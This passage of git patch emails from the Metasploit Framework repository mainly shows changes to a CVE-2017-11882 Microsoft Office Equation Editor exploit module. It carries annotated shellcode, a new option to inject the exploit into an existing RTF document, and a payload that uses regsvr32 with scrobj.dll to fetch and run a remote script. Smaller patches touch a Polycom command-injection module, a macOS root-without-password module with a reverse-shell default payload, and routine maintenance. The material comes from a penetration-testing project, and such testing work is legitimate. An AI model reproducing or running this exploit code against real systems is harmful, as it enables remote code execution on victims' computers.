if instance.respond_to?(:rport) peer = "#{rhost}:#{rport}" end From 7df46b33e88af63b98844eb4bceba16e40507c2b Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 1 Dec 2017 08:03:56 -0500 Subject: [PATCH 239/254] disassembly ASM --- .../windows/fileformat/office_ms17_11882.rb | 49 +++++++++++++++---- 1 file changed, 40 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 37f096f7ac..6aafc49c14 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -22,18 +22,17 @@ class MetasploitModule < Msf::Exploit::Remote a length of 109 bytes to be executed Affects Microsoft Office word for the latest 17 years. }, - 'Author' => ['mumbai', 'embedi', 'BlackMathIT'], + 'Author' => ['mumbai', 'embedi'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 15 2017', 'References' => [ ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], - ['URL', 'https://github.com/embedi/CVE-2017-11882'], - ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py'] + ['URL', 'https://github.com/embedi/CVE-2017-11882'] ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Microsoft Office Word', {} ], + ['Microsoft Office', {} ], ], 'DefaultTarget' => 0, 'Payload' => { @@ -131,11 +130,43 @@ class MetasploitModule < Msf::Exploit::Remote header << "000000000000000000000000000000000000000000000000000000000000000\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" - shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" - shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" - shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" + shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 + shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al + shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] + shellcode << "\x9e" # 6: 9e sahf + shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] + shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\xc8" # f: 00 c8 add al,cl + shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] + shellcode << "\\" # 12: 5c pop esp + shellcode << "\x00\xc4" # 13: 00 c4 add ah,al + shellcode << "\xee" # 15: ee out dx,al + shellcode << "[" # 16: 5b pop ebx + shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al + shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax + shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] + shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx] + shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl + shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 + shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 + shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx + shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] + shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c + shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx + shellcode << "\x53" # 3e: 53 push ebx + shellcode << "\x51" # 3f: 51 push ecx + shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 + shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx + shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] + shellcode << "\x53" # 49: 53 push ebx + shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c + shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] + shellcode << "\x90" # 50: 90 nop + shellcode << "\x90" # 50: 90 nop footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' From c788e4e54066c9cc99a44a261a7a07bfa53199e0 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 1 Dec 2017 11:36:03 -0500 Subject: [PATCH 240/254] Update office_ms17_11882.rb --- .../windows/fileformat/office_ms17_11882.rb | 181 ++++++++++-------- 1 file changed, 104 insertions(+), 77 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 6aafc49c14..291fe04045 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -46,88 +46,115 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]) + OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]), + OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil]) ]) end + def retrieve_header(filename) + if (not datastore['FOLDER_PATH'].nil?) + path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}" + else + path = nil + end + if (not path.nil?) + if ::File.file?(path) + File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s # otherwise I get nil class... + print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + return header + end + def generate_rtf - header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" - header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" - header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' - header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' - header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' - header << '09000600000000000000000000000100000001000000000000000010000002000' - header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' - header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' - header << '07400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' - header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' - header << '00000000000000000000000000000000000000000000000000000000000000003' - header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' - header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff01000002080000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' - header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000" - header << "000000000000000000000000000000000000000000000000000000000000000\n" + header = retrieve_header(datastore['FILENAME']) + object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + object_class << '09000600000000000000000000000100000001000000000000000010000002000' + object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + object_class << '07400720079000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000003' + object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << "00000300040000000000000000000000000000000000000000000000000000000" + object_class << "000000000000000000000000000000000000000000000000000000000000000\n" shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 @@ -215,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote payload += "\x00" * 2 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first - payload = header + payload + footer + payload = header + object_class + payload + footer payload end From fd1681edd9dfb041871ace9d69220d12d0089843 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 1 Dec 2017 10:04:07 -0800 Subject: [PATCH 241/254] Bump version of framework to 4.16.22 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index a507211199..02a3d0af4e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.21) + metasploit-framework (4.16.22) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 9ae49f17d5..ce52cf1258 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.21" + VERSION = "4.16.22" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 06334aa2bd6d5ae7c8ede0caa8cd2c250288506f Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 11:05:01 -0500 Subject: [PATCH 242/254] Update polycom_hdx_traceroute_exec.rb --- modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb index 033d433d37..de248ac09a 100644 --- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb +++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb @@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [[ 'Automatic', {} ]], 'Payload' => { 'Space' => 8000, From 7edab268f504fb0fe397acf792d34870d8c5d24a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 4 Dec 2017 12:47:40 -0600 Subject: [PATCH 243/254] handle case-insensitive password, fix received --- modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb index de248ac09a..f95797d672 100644 --- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb +++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb @@ -74,9 +74,9 @@ class MetasploitModule < Msf::Exploit::Remote sock = connect Rex.sleep(2) banner = sock.get_once - vprint_status("Recieved #{banner.length} bytes from service") + vprint_status("Received #{banner.length} bytes from service") vprint_line("#{banner}") - if banner =~ /password/ + if banner =~ /password/i print_status("Authentication enabled on device, authenticating with target...") if datastore['PASSWORD'].nil? print_error("#{peer} - Please supply a password to authenticate with") @@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['VERBOSE'] Rex.sleep(2) resp = sock.get_once - vprint_status("Recieved #{resp.length} bytes in response") + vprint_status("Received #{resp.length} bytes in response") vprint_line(resp) end From b7f17f5519521c4d4716c26e0c9ced5c6342bc4a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:41:27 -0500 Subject: [PATCH 244/254] fix documentation --- .../exploit/windows/fileformat/office_ms17_11882.md | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index b6b3ae81c6..b1b73d0468 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -1,5 +1,5 @@ -Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim -to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user. + +Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. ## Vulnerable Application @@ -24,18 +24,15 @@ Filename to output, and location to which should be written. ``` msf > use exploit/windows/fileformat/office_ms17_11882 -msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set FILENAME msf.rtf FILENAME => /home/mumbai/file.rtf msf exploit(office_ms17_11882) > set LHOST ens3 LHOST => ens3 msf exploit(office_ms17_11882) > set LPORT 35116 LPORT => 35116 msf exploit(office_ms17_11882) > run -[*] Exploit running as background job 0. - -[*] Started reverse TCP handler on 192.168.0.11:35116 -msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo -[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo +[*] Using URL: http://0.0.0.0:8080/BUY0DYgc +[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc [*] Server started. [*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 [*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending From b96dac28d520a51ac655e227bec0c4b8bae84106 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:42:41 -0500 Subject: [PATCH 245/254] fix info segment --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 291fe04045..9dc87de6a8 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -16,11 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Office CVE-2017-11882', 'Description' => %q{ - Module exploits a flaw in the Equation Editor, developed - in 2000, that allowed any OLE object to execute in a separate - address space. Compared to original PoC, allows for a command within - a length of 109 bytes to be executed Affects Microsoft Office word for the latest - 17 years. + Module exploits a flaw in how the Equation Editor that + allows an attacker to execute arbitrary code in RTF files without + interaction. The vulnerability is caused by the Equation Editor, + to which fails to properly handle OLE objects in memory. }, 'Author' => ['mumbai', 'embedi'], 'License' => MSF_LICENSE, From a27bb38d519759149bdb5c6100781da2f2341725 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 4 Dec 2017 18:25:18 -0600 Subject: [PATCH 246/254] add authors --- modules/exploits/osx/local/root_no_password.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb index 2fc91f8fe7..57588fafce 100644 --- a/modules/exploits/osx/local/root_no_password.rb +++ b/modules/exploits/osx/local/root_no_password.rb @@ -26,6 +26,10 @@ class MetasploitModule < Msf::Exploit::Local ], 'Platform' => 'osx', 'Arch' => ARCH_X64, + 'Author' => [ + 'chethan177', # earliest public discovery + 'timwr', # Metasploit module + ], 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', From b13f4e25e1c8cccad9ba0577768eafdb83be407e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 4 Dec 2017 18:32:31 -0600 Subject: [PATCH 247/254] thanks for making this well-known --- modules/exploits/osx/local/root_no_password.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb index 57588fafce..ff11728624 100644 --- a/modules/exploits/osx/local/root_no_password.rb +++ b/modules/exploits/osx/local/root_no_password.rb @@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Local 'Arch' => ARCH_X64, 'Author' => [ 'chethan177', # earliest public discovery + 'lemiorhan', # making this well-known via Twitter 'timwr', # Metasploit module ], 'DefaultOptions' => From adba277be0290d98c3b7044a749726cb6ad56f2a Mon Sep 17 00:00:00 2001 From: William Webb Date: Mon, 4 Dec 2017 16:57:48 -0800 Subject: [PATCH 248/254] axe errant spaces at EOL --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 9dc87de6a8..ec5b951c8d 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Office CVE-2017-11882', 'Description' => %q{ - Module exploits a flaw in how the Equation Editor that - allows an attacker to execute arbitrary code in RTF files without - interaction. The vulnerability is caused by the Equation Editor, + Module exploits a flaw in how the Equation Editor that + allows an attacker to execute arbitrary code in RTF files without + interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. }, 'Author' => ['mumbai', 'embedi'], From 14226c5f3353bf7b5788658d33301b92d46e0fe4 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 20:58:36 -0500 Subject: [PATCH 249/254] missing docs on options Missed fixes on documentation --- .../modules/exploit/windows/fileformat/office_ms17_11882.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index b1b73d0468..51f8bd7813 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -17,7 +17,10 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe ## Options ### FILENAME -Filename to output, and location to which should be written. +Filename to output & if injecting a file, the file to inject + +### FOLDER_PATH +Path to filename to inject ## Example From c15f37934379af99e0b01e99dd7ee003bba7b8f6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 4 Dec 2017 22:27:21 -0600 Subject: [PATCH 250/254] remove some unneeded backward-compat code --- lib/msf/core.rb | 3 +- lib/msf/sanity.rb | 28 -------- lib/msf/ui/console/driver.rb | 133 ++--------------------------------- 3 files changed, 5 insertions(+), 159 deletions(-) delete mode 100644 lib/msf/sanity.rb diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 881836e7f9..6eca2772ce 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -10,8 +10,7 @@ # ### -# Sanity check this version of ruby -require 'msf/sanity' +# Include backported features for older versions of Ruby require 'backports' # The framework-core depends on Rex diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb deleted file mode 100644 index dc5ef2696d..0000000000 --- a/lib/msf/sanity.rb +++ /dev/null @@ -1,28 +0,0 @@ -# -*- coding: binary -*- -# -# Provides some sanity checks against the ruby build and version -# - -if(RUBY_PLATFORM == 'java') - require 'socket' - s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) - 